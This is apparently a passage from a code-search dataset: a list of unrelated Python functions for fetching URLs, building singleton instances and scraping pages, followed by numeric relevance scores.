This will\n # cause 'urlopen()' to use POST to get the results.\n #\n o = urlparse.urlsplit(self.url)\n req = urllib2.Request(o.scheme + \"://\" + o.netloc + o.path, o.query)\n\n # If 'spoof_url' is NOT None, then we\n # want our request to use the 'spoof_url' as its referrer\n #\n if self.spoof_url is not None:\n req.add_header('Referer', self.spoof_url)\n\n # What we get from the remote site is UTF-8 so decode it in to unicode\n # and then encode that as ASCII with characters that can not be\n # represented in ASCII replaced with their XML character references.\n #\n f = urllib2.urlopen(req)\n content_type = f.info()['Content-Type'].lower()\n\n # Based on the content type we need to deal with the response\n # in various ways, like unzip, or re-encoding as ascii.\n #\n if content_type == \"application/zip\":\n # In zip files we extract all the individual files.\n #\n # NOTE: Since the zipfile.ZipFile class needs a file like object\n # with the 'seek()' method we use a StringIO to hold\n # our url result data.\n #\n result = []\n stringy = StringIO(f.read())\n z = zipfile.ZipFile(stringy, 'r')\n members = z.namelist()\n for member in members:\n result.append(z.read(member))\n z.close()\n stringy.close()\n\n # The way the scraper wants to work is that it gets all parts\n # of such a zip file as a single string.. so join them all\n # together (separated by a newline character, just because.)\n #\n result = \"\\n\".join(result)\n elif content_type[0:9] == \"text/xml;\":\n ign,charset = content_type.split('=')\n\n # XXX We should just return what we get and not encode it as\n # ascii. The end point should encode if it only wants to\n # see a string... (or maybe we SHOULD do this..)\n #\n result = f.read().decode(charset).encode(\"ascii\",\n \"xmlcharrefreplace\")\n else:\n # Finally we do not know what to do with it.. just read it\n # in to a string.\n #\n result = f.read()\n\n f.close()\n if self.cache_key:\n self.cache[self.cache_key] = result\n return result", "def get_instance():\n if not Cache.__instance__:\n Cache.__instance__ = Cache(config('REDIS_HOST'), config('REDIS_PORT'))\n return Cache.__instance__", "def _get_github_fetcher(\n parsed_url: ParsedUrl, output_dir: str, spec: Optional[str] = None\n) -> WorkflowFetcherBase:\n # There are four different GitHub URLs we are interested in:\n # 1. URL to a repository: /<user>/<repo>\n # 2. Git URL: /<user>/<repo>.git\n # 3. URL to a branch/commit/tag: /<user>/<repo>/tree/<git_ref>\n # 4. URL to a zip snapshot: /<user>/<repo>/archive/.../<git_ref>.zip\n components = _match_url(\n parsed_url,\n [\n \"/<username>/<repository>/\",\n \"/<username>/<repository>.git/\",\n \"/<username>/<repository>/tree/<path:git_ref>\",\n \"/<username>/<repository>/archive/<path:zip_path>\",\n ],\n )\n\n username = components[\"username\"]\n repository = components[\"repository\"]\n git_ref = components.get(\"git_ref\")\n zip_path = components.get(\"zip_path\")\n\n if zip_path:\n # The name of the zip file is the git commit/branch/tag\n git_ref = parsed_url.basename_without_extension\n workflow_name = f\"{repository}-{git_ref}\"\n return WorkflowFetcherZip(parsed_url, output_dir, spec, workflow_name)\n else:\n repository_url = ParsedUrl(f\"https://github.com/{username}/{repository}.git\")\n return WorkflowFetcherGit(repository_url, output_dir, git_ref, spec)", "def _get_gitlab_fetcher(\n parsed_url: ParsedUrl, output_dir: str, spec: Optional[str] = None\n) -> WorkflowFetcherBase:\n # There are four different GitLab URLs we are interested in:\n # 1. 
URL to a repository: /<user>/<repo>\n # 2. Git URL: /<user>/<repo>.git\n # 3. URL to a branch/commit/tag: /<user>/<repo>/-/tree/<git_ref>\n # 4. URL to a zip snapshot: /<user>/<repo>/-/archive/.../<repo>-<git_ref>.zip\n # Note that GitLab supports recursive subgroups, so <user> can contain slashes\n components = _match_url(\n parsed_url,\n [\n \"/<path:username>/<repository>/\",\n \"/<path:username>/<repository>.git/\",\n \"/<path:username>/<repository>/-/tree/<path:git_ref>\",\n \"/<path:username>/<repository>/-/archive/<path:zip_path>\",\n ],\n )\n\n username = components[\"username\"]\n repository = components[\"repository\"]\n git_ref = components.get(\"git_ref\")\n zip_path = components.get(\"zip_path\")\n\n if zip_path:\n # The name of the zip file is composed of the repository name and\n # the git commit/branch/tag\n workflow_name = parsed_url.basename_without_extension\n return WorkflowFetcherZip(parsed_url, output_dir, spec, workflow_name)\n else:\n repository_url = ParsedUrl(\n f\"https://{parsed_url.hostname}/{username}/{repository}.git\"\n )\n return WorkflowFetcherGit(repository_url, output_dir, git_ref, spec)", "def __init__(self, context=None):\r\n self._org_url = PARAMS['BB_ORG_FETCHER_URL']\r\n self._cached_metadata = defaultdict(dict)\r\n self._remote_cache_timestamp = None\r\n self._bb_request_time_limit = int(PARAMS[\"BB_REQUEST_TIME_LIMIT\"])\r\n\r\n try:\r\n context_key = PARAMS['FOUNDATION'].split('-')[1][:3]\r\n self._context = context or self._context_map[context_key]\r\n except KeyError:\r\n if context_key not in self._unmapped_contexts:\r\n LOGGER.error(\"Can't map foundation %s\", context_key)\r\n raise InvalidFoundation\r\n else:\r\n self._context = None\r\n\r\n if self._context:\r\n available_contexts = self._context_list()\r\n if not available_contexts \\\r\n or self._context not in available_contexts:\r\n LOGGER.error(\"Context %s (foundation %s) not in context list %s\",\r\n self._context,\r\n PARAMS['FOUNDATION'],\r\n ','.join(available_contexts) if available_contexts\r\n else \"(no contexts)\")\r\n raise ContextNotAvailable\r\n\r\n LOGGER.info(\"Initialize fetcher (context(s): %s)\", self._context)\r\n super().__init__()", "def _fetch(cls, *args, **kwargs):\n apikey = htpc.settings.get('plexpy_apikey')\n\n if apikey is None:\n raise\n\n url = '%sapi/v2?apikey=%s&%s' % (cls._build_url(), apikey, urlencode(kwargs))\n\n try:\n r = requests.get(url, verify=False)\n r.raise_for_status()\n # Lets just copy the headers for now.\n cherrypy.response.headers['Content-Type'] = r.headers.get('Content-Type', 'application/json;charset=UTF-8')\n resp = r.json()\n if resp.get('response', {}).get('result') == 'success':\n return resp['response']['data']\n except:\n log.exception('Failed to get %s' % url)\n return", "def parse(self):\n \n r = requests.get(self.url)\n if r:\n self.title = fetch_title(self.url)\n self.domain = self.fetch_domain()\n self.favicon = self.fetch_favicon()\n self.topics = self.classify_topics()\n self.description = self.fetch_description()\n return self", "def Fetch(self, request, global_params=None):\n config = self.GetMethodConfig('Fetch')\n return self._RunMethod(\n config, request, global_params=global_params)", "def from_crawler(cls, crawler):\n return cls.from_settings(crawler.settings)", "def get_instance(self, name):\n klass = self.get_class(name)\n return klass()", "def get(self):\n return self.handler(url=self.url)", "def load(cls):\n\n try:\n return cls.objects.get()\n except cls.DoesNotExist:\n return cls()", "def __get__(self, 
instance, owner):\n if instance._location is None:\n raise AttributeError('Cannot find URL of %s relative to URL-less %s' % (self.cls.__name__, owner.__name__))\n newurl = join(instance._location, self.api_name)\n obj = self.cls.get(newurl, auth=instance.auth)\n obj.auth = instance.auth\n return obj", "def _get(self, url):\n return self._request(url)", "def fetch(self, remote, *args):\n return self.cmd('fetch', remote, *args)", "def fetch(self, endpoint: str, query: str = None, protocol: str = protocol,\n host: str = host) -> Response:\n\n # overwrite the class attributes to custom values provided by the method's arguments\n self.endpoint = endpoint\n self.query = query\n self.protocol = protocol\n self.host = host\n\n # concatenate arguments to URL and save as attribute\n self.URL = f'{protocol}://{host}{endpoint}{query}'\n\n logger.debug(f'Fetching from API: {self.URL}')\n ret = requests.get(self.URL)\n logger.debug(f'Returning from API: {ret} {ret.content}')\n return ret", "def fetch(cls, url):\n delta = time.time() - cls._time_last_fetched\n wait_time = TIME_TIL_RETRY - delta\n if wait_time > 0:\n time.sleep(wait_time)\n resp = requests.get(url)\n cls._time_last_fetched = time.time()\n resp.raise_for_status()\n return resp", "def _get_one(self,url):\n pass", "def _get_instance(self):", "def _get_instance(self):", "def get_instance():\n if Classifier.__instance is None:\n Classifier()\n return Classifier.__instance", "def get_instance(cls):\n return cls.__new__(cls)", "def get_instance(cls):\n return cls.__new__(cls)", "def get_instance(cls):\n return cls.__new__(cls)", "def fetch(self):\n # This method also sets self._results_filtered and\n # self._urltable.\n page = self._conn.fetch_page(self._ddg_url.relative())\n\n if logger.isEnabledFor(logging.DEBUG):\n import tempfile\n fd, tmpfile = tempfile.mkstemp(prefix='ddgr-response-')\n os.close(fd)\n with open(tmpfile, 'w', encoding='utf-8') as fp:\n fp.write(page)\n logger.debug(\"Response body written to '%s'.\", tmpfile)\n\n parser = DdgParser(news=self._ddg_url.news)\n parser.feed(page)\n\n self.results = parser.results\n self._results_filtered = parser.filtered\n self._urltable = {}\n for r in self.results:\n self._urltable.update(r.urltable())", "def get_instance(cls, *args, **kwargs):\n if cls._instance is not None:\n return cls._instance\n return cls(*args, **kwargs)", "def getInstance(cls):\n cls.locker.acquire()\n try:\n if not cls.instance:\n cls.instance = cls()\n return cls.instance\n finally:\n cls.locker.release()", "def getResource(self, url):\n\n res = self.getRequest(url)\n return self._instantiateResource(res)", "def __call__(self, *args, **kwargs):\n return self.fetch(*args, **kwargs)", "def fetch(self):\n if not self.__class__.handler:\n raise IcebergNoHandlerError()\n\n data = self.__class__.handler.request(self.resource_uri)\n\n return self._load_attributes_from_response(**data)", "async def fetch_async(self) -> WorkflowInstance:\n\n payload = await self._version.fetch_async(\n method=\"GET\",\n uri=self._uri,\n )\n\n return WorkflowInstance(\n self._version,\n payload,\n workspace_sid=self._solution[\"workspace_sid\"],\n sid=self._solution[\"sid\"],\n )", "def _get_soup_object(url: str) -> bs4.BeautifulSoup:\n request_result=requests.get(url)\n soup = bs4.BeautifulSoup(request_result.text, \"html.parser\")\n return soup", "def return_instance(cls):\n return cls()", "def getRedditInstance():\r\n\r\n return praw.Reddit(client_id=REDDIT_CLIENT_ID,\r\n client_secret=REDDIT_CLIENT_SECRET,\r\n 
user_agent=REDDIT_USER_AGENT)", "def get_feed_fetcher(cls, cskey, fsid, topic_keys):\n if len(topic_keys) != 1:\n return None\n topic_key = topic_keys[0]\n topic = Topic.get_by_topic_key(topic_key)\n required_keywords, feed_url = FeedSourceConfig.get_matched_custom_feed(fsid, topic.name) \n return cls(cskey, fsid, required_keywords, feed_url) if feed_url else None", "def get_instance(self):\n try:\n return self._instance\n except AttributeError:\n self._instance = self._decorated()\n return self._instance", "def fetch(self):\n try:\n self.__genre = 'review'\n self.__baseuri = 'http://ehealthforum.com'\n self.__setSoupForCurrentUri()\n \n if not re.search('\\d+\\.html$', self.currenturi):\n return self.__createTasksForThreads()\n else:\n return self.__addThreadAndPosts()\n except:\n log.exception(self.log_msg('Exception in fetch for the url %s'%self.currenturi))\n return False", "def _create_instance(cls, configuration, auth_type):\n auth = ClientAuthFactory.get(\n username=configuration.username,\n password=configuration.password,\n auth_type=auth_type\n )\n instance = HttpClient(configuration.url, auth)\n cls._INSTANCES[configuration] = instance\n return instance", "def open(self, url, conn_timeout=None, **kw):\r\n url = self.maybe_local_url(url)\r\n with TRACER.timed('Fetching %s' % url, V=1):\r\n if not self.reachable(url, conn_timeout=conn_timeout):\r\n raise FetchError('Could not reach %s within deadline.' % url)\r\n try:\r\n return urllib_request.urlopen(url, **kw)\r\n except (urllib_error.URLError, HTTPException) as exc:\r\n raise FetchError(exc)", "def refresh(self) -> object:\n requestor = Requestor(local_api_key=self._api_key)\n url = self.instance_url()\n response, api_key = requestor.request(method=RequestMethod.GET, url=url, params=self._retrieve_params)\n self.refresh_from(values=response, api_key=api_key)\n return self", "def fetch_object(url):\n print(' GET ' + url)\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=15)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n r = session.get(url)\n # Covering internal server errors by retrying one more time\n if r.status_code == 500:\n time.sleep(5)\n r = requests.get(url, allow_redirects=True)\n elif r.status_code != 200:\n print(f\"Problem with request: {str(r)}\")\n raise RuntimeError(\"Non-200 status code\")\n return r", "async def fetch_repository(self, name: str) -> \"Repository\":\n\n # prevent cyclic imports\n from github.objects import Repository\n\n data = await self.http.fetch_repository(self.login, name)\n return Repository.from_data(data, self.http)", "def __init__(self, mode: str = \"\", src: str = \"\", ds: str = \"\", **fetcher_kwargs):\n\n # Facade options:\n self._mode = OPTIONS[\"mode\"] if mode == \"\" else mode\n self._dataset_id = OPTIONS[\"dataset\"] if ds == \"\" else ds\n self._src = OPTIONS[\"src\"] if src == \"\" else src\n\n _VALIDATORS[\"mode\"](self._mode)\n _VALIDATORS[\"src\"](self._src)\n _VALIDATORS[\"dataset\"](self._dataset_id)\n\n # Load data source access points:\n if self._src not in AVAILABLE_DATA_SOURCES:\n raise InvalidFetcher(\n \"Requested data fetcher '%s' not available ! 
Please try again with any of: %s\"\n % (self._src, \"\\n\".join(AVAILABLE_DATA_SOURCES))\n )\n else:\n Fetchers = AVAILABLE_DATA_SOURCES[self._src]\n\n # Auto-discovery of access points for this fetcher:\n # rq: Access point names for the facade are not the same as the access point of fetchers\n self.Fetchers = {}\n self.valid_access_points = []\n for p in Fetchers.access_points:\n if p == \"box\": # Required for 'region'\n self.Fetchers[\"region\"] = Fetchers.Fetch_box\n self.valid_access_points.append(\"region\")\n if p == \"wmo\": # Required for 'profile' and 'float'\n self.Fetchers[\"float\"] = Fetchers.Fetch_wmo\n self.valid_access_points.append(\"float\")\n self.Fetchers[\"profile\"] = Fetchers.Fetch_wmo\n self.valid_access_points.append(\"profile\")\n\n # Init sub-methods:\n self.fetcher = None\n if self._dataset_id not in Fetchers.dataset_ids:\n raise ValueError(\n \"%s dataset is not available for this data source (%s)\"\n % (self._dataset_id, self._src)\n )\n self.fetcher_kwargs = {**fetcher_kwargs}\n self.fetcher_options = {**{\"ds\": self._dataset_id}, **fetcher_kwargs}\n self.postproccessor = self.__empty_processor\n self._AccessPoint = None\n\n # Init data structure holders:\n self._index = None\n self._data = None\n\n # Dev warnings\n # Todo Clean-up before each release\n if self._dataset_id == \"bgc\" and self._mode == \"standard\":\n warnings.warn(\n \"'BGC' dataset fetching in 'standard' user mode is not reliable. \"\n \"Try to switch to 'expert' mode if you encounter errors.\"\n )", "def fetch_url_feed(self, url, **args):\n return self.fetch(\"/url\", url=url, **args)", "def get_from_uri(self, url, skip_cache=False, *args, **kwargs):\n\n cleaned_url = handle_slash(url, self.model._meta['add_slash'])\n\n if skip_cache:\n cached_response = None\n else:\n cached_response = self.get_from_cache('GET', cleaned_url)\n\n if cached_response:\n response = cached_response\n else:\n response = self._request('GET', cleaned_url, *args, **kwargs)\n\n self.validate_get_response(response)\n self.handle_get_response(response)\n\n # should this be handled by handle_get_response? i think probably.\n obj = self.obj_from_response(response)\n\n obj._full_url = cleaned_url\n\n return obj", "def get_cache_instance ( ):\n cache_strategy_instance = SimpleCacheStrategy ( )\n cache_strategy_instance.apply_cache_strategy ( threshold=50, default_timeout=100 )\n return cache_strategy_instance", "def __init__(self, url=URL):\n self.entries = feedparser.parse(url).entries", "def _get(self, components, picker, **params):\n url = '/'.join((self.base,) + components)\n\n headers = {\"Authorization\": \"Token token=\" + self._token}\n\n params['page'] = params.get('page') or self.page\n params['per_page'] = params.get('per_page') or self.per_page\n\n r = requests.get(\".\".join([url, self.format]),\n params=params,\n headers=headers)\n\n _next = self._nextify(components, picker, params)\n\n return Result(r, picker, _next)", "def _fetch_resource(self):\n\n qs = self._build_qs() # Build the query string\n url = self._build_url(qs) # Build the full url\n fp = self._api_call(url) # Fetch the data as a file pointer\n\n # Parse the list of dicts in to a dict generator\n return csv.DictReader(fp)", "def get_object(self):\n queryset = self.filter_queryset(self.get_queryset())\n\n # Perform the lookup filtering.\n lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field\n\n assert lookup_url_kwarg in self.kwargs, (\n 'Expected view %s to be called with a URL keyword argument '\n 'named \"%s\". 
Fix your URL conf, or set the `.lookup_field` '\n 'attribute on the view correctly.' %\n (self.__class__.__name__, lookup_url_kwarg)\n )\n\n filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}\n obj = get_object_or_404(queryset, **filter_kwargs)\n\n # May raise a permission denied\n self.check_object_permissions(self.request, obj)\n\n return obj", "def me(self):\n\n return self.client._get(self._url())", "def get_soup_obj(url):\n try:\n html = session.get(url, headers=headers).text\n return BeautifulSoup(html, \"html.parser\")\n except HTTPError:\n print(\"{} not reachable\".format(url))\n return None", "def fetch(self, url, body=None, headers=None):\r\n if body:\r\n # method = 'POST'\r\n # undo the URL encoding of the POST arguments\r\n data = parse_qs(body)\r\n response = self.client.post(url, data)\r\n else:\r\n # method = 'GET'\r\n data = {}\r\n if headers and 'Accept' in headers:\r\n data['CONTENT_TYPE'] = headers['Accept']\r\n response = self.client.get(url, data)\r\n\r\n # Translate the test client response to the fetcher's HTTP response abstraction\r\n content = response.content\r\n final_url = url\r\n response_headers = {}\r\n if 'Content-Type' in response:\r\n response_headers['content-type'] = response['Content-Type']\r\n if 'X-XRDS-Location' in response:\r\n response_headers['x-xrds-location'] = response['X-XRDS-Location']\r\n status = response.status_code\r\n\r\n return HTTPResponse(\r\n body=content,\r\n final_url=final_url,\r\n headers=response_headers,\r\n status=status,\r\n )", "def getInstance(klass):\n klass.locker.acquire()\n try:\n if not klass.instance:\n klass.instance = klass()\n return klass.instance\n finally:\n klass.locker.release()", "def fetch(self):\n raise NotImplementedError()", "def get(cls):\n return cls.instance", "def get(self):\n request = urllib.request.Request(self.url)\n if self.proxy:\n request.set_proxy(self.proxy, 'http')\n logger.info(\"Attempt to do GET request: url=%s, proxy=%s\",\n self.url, self.proxy)\n response = urllib.request.urlopen(request)\n logger.info(\"GET request was successful: url=%s, proxy=%s\",\n self.url, self.proxy)\n return response", "def getInstance():\n return net()", "def get_instance(cls):\n global FW_MANAGER_API\n if not FW_MANAGER_API:\n FW_MANAGER_API = cls()\n return FW_MANAGER_API", "def load_to_scraper(self, scraper):\n scraper.url = self.url\n scraper.response = self.response\n scraper.load_soup()\n return scraper", "def fetch_and_load(this_class, model_name, models_directory=None,\n verbose=False, extra_loading_options=None):\n from .ModelFetcher import download_and_install_model\n model_dir = download_and_install_model(model_name,\n models_directory,\n verbose)\n\n kwargs = extra_loading_options or {}\n return this_class.from_unified_model_dir(model_dir, **kwargs)", "def fetchContent(self):\n print 'fetching page by its path: '+ self.path\n uri = '%s?path=%s' % (self.client.MakeContentFeedUri(), self.path)\n # get the content feed\n feed = self.client.GetContentFeed(uri=uri)\n # take out the content\n self.entry = feed.get_webpages()[0]", "def GetInstance():\n pass", "def get_instance(cls):\n global DNS_MANAGER_API\n if not DNS_MANAGER_API:\n DNS_MANAGER_API = cls()\n return DNS_MANAGER_API", "def return_beautiful_soup_object(url: str) -> bs4.BeautifulSoup:\n html_filename, headers = urllib.request.urlretrieve(url)\n with open(html_filename) as file:\n soup = BeautifulSoup(file, 'html.parser')\n file.close()\n return soup", "def retrieve(self):\n return self._wrapper(self._retrieve)", "def 
_get_instance(cls, configuration, auth_type):\n if configuration in cls._INSTANCES:\n return cls._INSTANCES[configuration]\n return cls._create_instance(configuration, auth_type)", "def from_crawler(cls, crawler):\n\n return cls(crawler.settings.get('ITEM_DATA_STORE'))", "def fetch(self):\n pass", "def fetch(self):\n pass", "def fetch(self) -> None:\n pass", "def get(self):\r\n return http.Request('GET', self.get_url()), parsers.parse_json", "def get(self):\r\n return http.Request('GET', self.get_url()), parsers.parse_json", "def _get_cached_instance(self):\n\n try:\n identifier = self._get_identifier()\n except (ValueError, ObjectDoesNotExist) as error:\n if self._fail_silently:\n return None\n raise LazyModelObjectError(exc=error) from error\n\n # Get the cache key, basically just namespacing the identifier\n cache_key = model_cache_key(identifier)\n\n cache, timeout = self._cache\n cace: BaseCache\n if cache_key in cache:\n instance = cache.get(cache_key)\n else:\n instance = self._get_instance(identifier)\n cache.set(cache_key, instance, timeout=timeout)\n\n if instance is None and not self._fail_silently:\n raise LazyModelObjectError(f'{identifier} not found.')\n return instance", "def __get(self, url, headers=None):\n return self.__req(url, \"GET\", headers=headers)", "async def fetch_page(self, url: str) -> PageRaw:\n\n raise NotImplementedError()", "def createClientFromUrl(url, authStrategy=None):\n return MetaClient(MetaHttpClient(url, authStrategy))", "def from_url(cls, url):\n query_params = _get_query_params_from_url(url)\n\n if _get_param(query_params, \"SERVICE\") == \"WMS\":\n layer = _get_param(query_params, \"LAYERS\")\n elif _get_param(query_params, \"SERVICE\") == \"WCS\":\n layer = _get_param(query_params, \"COVERAGE\")\n\n d = None\n if layer.startswith(\"https://\"):\n d = _get_from_url(layer).json()\n elif layer.startswith(\"s3://\"):\n parts = layer.split(\"/\")\n bucket = parts[2]\n key = \"/\".join(parts[3:])\n s3 = S3CacheStore(s3_bucket=bucket)\n s = s3._load(key)\n elif layer == \"%PARAMS%\":\n s = _get_param(query_params, \"PARAMS\")\n else:\n p = _get_param(query_params, \"PARAMS\")\n if p is None:\n p = \"{}\"\n if not isinstance(p, dict):\n p = json.loads(p)\n return cls.from_name_params(layer, p)\n\n if d is None:\n d = json.loads(s, object_pairs_hook=OrderedDict)\n\n return cls.from_definition(d)", "def from_url(cls, url):\n query_params = _get_query_params_from_url(url)\n\n if _get_param(query_params, \"SERVICE\") == \"WMS\":\n layer = _get_param(query_params, \"LAYERS\")\n elif _get_param(query_params, \"SERVICE\") == \"WCS\":\n layer = _get_param(query_params, \"COVERAGE\")\n\n d = None\n if layer.startswith(\"https://\"):\n d = _get_from_url(layer).json()\n elif layer.startswith(\"s3://\"):\n parts = layer.split(\"/\")\n bucket = parts[2]\n key = \"/\".join(parts[3:])\n s3 = S3CacheStore(s3_bucket=bucket)\n s = s3._load(key)\n elif layer == \"%PARAMS%\":\n s = _get_param(query_params, \"PARAMS\")\n else:\n p = _get_param(query_params, \"PARAMS\")\n if p is None:\n p = \"{}\"\n if not isinstance(p, dict):\n p = json.loads(p)\n return cls.from_name_params(layer, p)\n\n if d is None:\n d = json.loads(s, object_pairs_hook=OrderedDict)\n\n return cls.from_definition(d)", "def get_handler(cls):\n if cls.__instance is None:\n cls.__instance = AliceBlueApi()\n return cls.__instance", "def urlfetch(self, url, **kwargs):\n logging.debug('Fetching %s with kwargs %s', url, kwargs)\n resp = urlfetch.fetch(url, deadline=999, **kwargs)\n\n if resp.status_code == 
200:\n return resp.content\n else:\n logging.warning('GET %s returned %d:\\n%s',\n url, resp.status_code, resp.content)\n self.handler.response.headers.update(resp.headers)\n self.handler.response.out.write(resp.content)\n raise exc.status_map.get(resp.status_code)(resp.content)", "def feed(self):\r\n return feed.Feed(self)", "def feed(self):\n return feed.Feed(self)", "def get_instance():\n if NrsGlobalCache._instance is None:\n NrsGlobalCache()\n return NrsGlobalCache._instance", "def _cache(self):\n return self._class(self.client_servers, **self._options)", "def get(cls, uri):\n return cls._perform_request(uri, 'GET')", "def get_worker(self):\n worker = self.worker(job_id=self.job_id, spider=self.spider,\n http_session={'url': self.url, 'timeout': self.timeout},\n **self.kwargs)\n return worker", "def load(cls, host):\n\n return cls(host)", "def instance(cls):\n if cls._instance is None:\n cls._instance = cls()\n return cls._instance", "def _urlfetch(**kwargs):\n return ndb.get_context().urlfetch(**kwargs)" ]
[ "0.7616966", "0.64553005", "0.6100894", "0.6082667", "0.59977883", "0.5952911", "0.58968616", "0.58818334", "0.5799498", "0.5791189", "0.5787772", "0.57814115", "0.57779944", "0.577231", "0.57723045", "0.5654948", "0.56429166", "0.56370324", "0.56276923", "0.56252486", "0.5616734", "0.5604621", "0.558886", "0.5573998", "0.5554595", "0.5554217", "0.55488104", "0.5500979", "0.54956883", "0.54956883", "0.5494509", "0.54927844", "0.54927844", "0.54927844", "0.5482204", "0.54778117", "0.5476008", "0.5460109", "0.5421826", "0.5405134", "0.53994626", "0.5371193", "0.5358972", "0.5351141", "0.534241", "0.5335163", "0.53332824", "0.5326274", "0.5319263", "0.53168356", "0.53160816", "0.53146845", "0.53129566", "0.53111976", "0.5310447", "0.53045255", "0.52767104", "0.52746314", "0.5270871", "0.52665585", "0.52654934", "0.52600366", "0.5253245", "0.5244662", "0.5237839", "0.5237668", "0.52320045", "0.5221066", "0.52208376", "0.52158904", "0.5215831", "0.52095515", "0.5207857", "0.5200362", "0.51949775", "0.5194516", "0.5190189", "0.51885635", "0.518162", "0.518162", "0.5177982", "0.5177188", "0.5177188", "0.51757616", "0.51667875", "0.5162909", "0.51546913", "0.5147136", "0.5147136", "0.5146348", "0.5143989", "0.5136106", "0.5132702", "0.5127655", "0.5119212", "0.51177186", "0.5112521", "0.5111812", "0.5111797", "0.50988054" ]
0.6439661
2
fetcher.get_projects() should return a list of projects.
def test_get_projects_returns_projects(fc: fetcher.Fetcher):
    projects = fc.get_projects()
    assert isinstance(projects, list)
    assert isinstance(projects[0], models.Project)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_projects(self):\n projects = []\n page = 1\n while not len(projects) % 100:\n projects += self._get('/projects?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not projects:\n break\n page += 1\n return projects", "def get_projects(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/projects\").json()", "def get_projects(self):\n response = self.request(verb=requests.get, address=\"projects\")\n # FIXME: if no results, must we raise an exception?\n return response[\"results\"] if \"results\" in response else response", "def get_projects(self, _is_simple=False):\n req_url = f\"{self.url}/projects\"\n if _is_simple:\n req_url += \"?simple=true\"\n ret = requests.get(req_url, headers = self.req_header)\n return ret.json()", "def test_projects_get(self):\n response = self.client.open('/project-tracker/projects',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def get_projects(self):\n res = self.conn.cursor().execute(\"SELECT * FROM projects\")\n return res.fetchall()", "def test_get_project_list_with_projects(self):\n # Add two test projects.\n projects = [\n add_project(title='1', description='1'),\n add_project(title='2', description='2'),\n ]\n\n result = get_project_list()\n result_projects = result['projects'].object_list\n\n # Make sure two test projects are retrieved.\n for project in projects:\n self.assertTrue(project in result_projects)\n self.assertEqual(len(result_projects), len(projects))\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def project_list(self):\n try:\n ids = self.request[api.DATA][api.DATA][\"ids\"]\n return self._get_keystone_projects(ids)\n except Exception as e:\n LOG.exception(\"Error occurred: %s\" % e)", "def list_projects(self):\n data = self._run(\n url_path=\"projects/list\"\n )\n projects = data['result'].get('projects', [])\n return [self._project_formatter(item) for item in projects]", "def projects():\n response = jsonify(projects_service.get_top_level_projects_ids())\n return response", "def _get_projects(project_ids):\n if _ALL in project_ids:\n return projects_lib.get_all()\n return projects_lib.get_selective(project_ids)", "def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):\n projects = fc.get_projects(test_project_name)\n assert isinstance(projects, list)\n assert len(projects) == 1\n assert projects[0].name == test_project_name", "def list_projects():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_projects\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)[\"projects\"]", "def test_get_projects(self):\n pass", "def list_projects(arn=None, nextToken=None):\n pass", "def get_projects(self, *criterion):\n from wkcdd.models.helpers import get_project_list\n return get_project_list([self.id], *criterion)", "def getprojects(self):\n resp = self.conn.request('GET', self.URLS['allprojects'], dict(api_key=self.api_key))\n data = resp.data.decode('utf-8')\n jdata = json.loads(data)['projects']\n # Convert nested JSON documents\n for project_index in range(len(jdata)):\n for field in ('options_json', 'templates_json'):\n jdata[project_index][field] = json.loads(jdata[project_index][field])\n # Pass project details dictionaries to constructors, return array\n return [PhProject(self, project) for project in jdata]", "def 
get_projects(self):\n return conf.projects", "def projects(self):\n ret_val = []\n params = {\"fields\": Project.FIELDS}\n projects = self._request(\"get\", \"projects\", params=params)\n\n for project in projects:\n ret_val.append(Project(project))\n\n return ret_val", "def get_projects():\n return Project.query.all()", "def list_projects(ctx):\n pprint(ctx.obj.groups.get().data)", "def get_projects(self):\n return self._gitlab.owned_projects(per_page=1000)", "def get_projects(self):\n return self.jira.projects()", "def get_all_projects(self, scope):\n url = \"{0}/{1}/{2}\".format(self.keystone_server_url, DEFAULT_KEYSTONE_API_VERSION, \"projects\")\n headers = {'X-Auth-Token': scope.auth_token}\n try:\n r = self._make_request_with_auth_fallback(url, headers)\n return r['projects']\n\n except Exception as e:\n self.warning('Unable to get projects: %s', e)\n raise e\n\n return None", "def get_project_list():\n return parse_list_output(Popen(\n 'openstack project list'.split(), stdout=STDOUT, stderr=STDERR\n ).communicate()[0])", "def get_projects(self):\n ret = self.v1_projects.get()\n return [each.metadata.name for each in ret.items]", "def getProjects(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n path = '{}/projects'.format('/'.join(plone.api.portal.get().getPhysicalPath()))\n query = dict(portal_type='Project', sort_on='sortable_title', path=path)\n result = list()\n for brain in catalog(**query):\n result.append((brain.getId, brain.Title))\n return result", "def list_keystone_v3_projects(self):\n LOG_OBJ.debug(\"List the projects.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/projects\"\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while creating project\")\n print (\"No response from Server while creating project\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\" Creating project Failed with status %s \"\n \"and error : %s\" % (response.status, response.data))\n print (\" Creating project Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Projects list : %s \" % output)\n print (\"Projects list : %s \" % output)\n return output['projects']", "def projects(args):\n _projects = lib.get_projects(\n args.target, username=args.username, password=args.password\n )\n if _projects:\n print(\"\\n\".join(_projects))", "def all(cls):\n projects_url = 'https://www.pivotaltracker.com/services/v5/projects'\n root = _perform_pivotal_get(projects_url)\n if root is not None:\n return [Project.from_json(project_node) for project_node in root]", "def get_project_list(self, dummy_project):\n # TODO: domain scope 403 is probably to do with faulty keystone policy config -- revise?\n if not 